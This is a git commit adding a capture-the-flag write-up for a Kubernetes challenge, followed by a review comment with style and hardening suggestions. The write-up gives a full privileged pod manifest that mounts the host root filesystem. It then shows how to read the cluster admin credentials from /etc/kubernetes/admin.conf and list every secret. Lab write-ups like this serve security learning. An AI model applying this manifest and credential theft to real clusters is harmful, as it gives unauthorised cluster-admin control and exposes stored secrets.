author: Aria <me@aria.rip> 2023-10-01 17:23:09 +0100
committer: Aria <me@aria.rip> 2023-10-01 17:23:09 +0100
commit: b5b9cf7a1f61d004d7d53584d029c19302c63ba0 (patch)
tree: 49c3022dccf669f9f2b905ddfbd2d16db2d10d84 /punkctf/k8s_04.md
initial commit
Diffstat (limited to 'punkctf/k8s_04.md')
-rw-r--r-- punkctf/k8s_04.md 50
1 files changed, 50 insertions, 0 deletions
diff --git a/punkctf/k8s_04.md b/punkctf/k8s_04.md
new file mode 100644
index 0000000..3212624
--- /dev/null
+++ b/punkctf/k8s_04.md
@@ -0,0 +1,50 @@
+
+Using `kubectl auth can-i --list` we find we still can't look at secrets directly, but we can create pods now.
+
+These pods don't have any security policy applied, meaning there are plenty of privesc routes we can take, most of them described [here](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation).
+
+Here is the pod i created:
+
+```yaml
+apiVersion: v1
+kind: Pod
+metadata:
+ name: everything-allowed-exec-pod
+ labels:
+ app: pentest
+spec:
+ hostNetwork: true
+ hostPID: true
+ hostIPC: true
+ containers:
+ - name: everything-allowed-pod
+ image: busybox
+ imagePullPolicy: IfNotPresent
+ securityContext:
+ privileged: true
+ volumeMounts:
+ - mountPath: /host
+ name: noderoot
+ command: [ "/bin/sh", "-c", "--" ]
+ args: [ "while true; do sleep 30; done;" ]
+ volumes:
+ - name: noderoot
+ hostPath:
+ path: /
+```
+
+We can then `kubectl exec -it pod/everything-allowed-exec-pod sh` and explore the host filesystem at `/host`.
+
+Looking in `/host/etc/kubernetes/admin.conf` (the standard location for the cluster admin config), we get connection details to login as cluster admin:
+
+```
+users:
+- name: kubernetes-admin
+ user:
+ client-certificate-data: <long base64 string>
+ client-key-data: <long base64 string>
+```
+
+We put this in our terminals `.kube/config`, and use it to enumerate the secrets with `kubectl get secret -A`
+
+We find a secret in the `kube-system` namespace, from which we get the flag `punk_{3WPF4FB37UMJV31D}`
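Review bot: the `kubectl exec -it pod/everything-allowed-exec-pod sh` line near the end of the hunk passes the command without the `--` separator, a form kubectl reports as deprecated; write it as `kubectl exec -it pod/everything-allowed-exec-pod -- sh`. The second code fence (the `admin.conf` excerpt) is untagged while the manifest above it is tagged `yaml`, so tag both the same way. Minor wording: "i created" should be "I created", "our terminals `.kube/config`" should be "our terminal's `.kube/config`", and the last two sentences have no closing period. Because the write-up attributes the escalation to pods that "don't have any security policy applied", a closing sentence naming the control that would have rejected this manifest (for example Pod Security Admission at the baseline or restricted level, which disallows `privileged`, the `host*` namespaces and `hostPath` volumes) would make the file more useful to readers hardening a cluster.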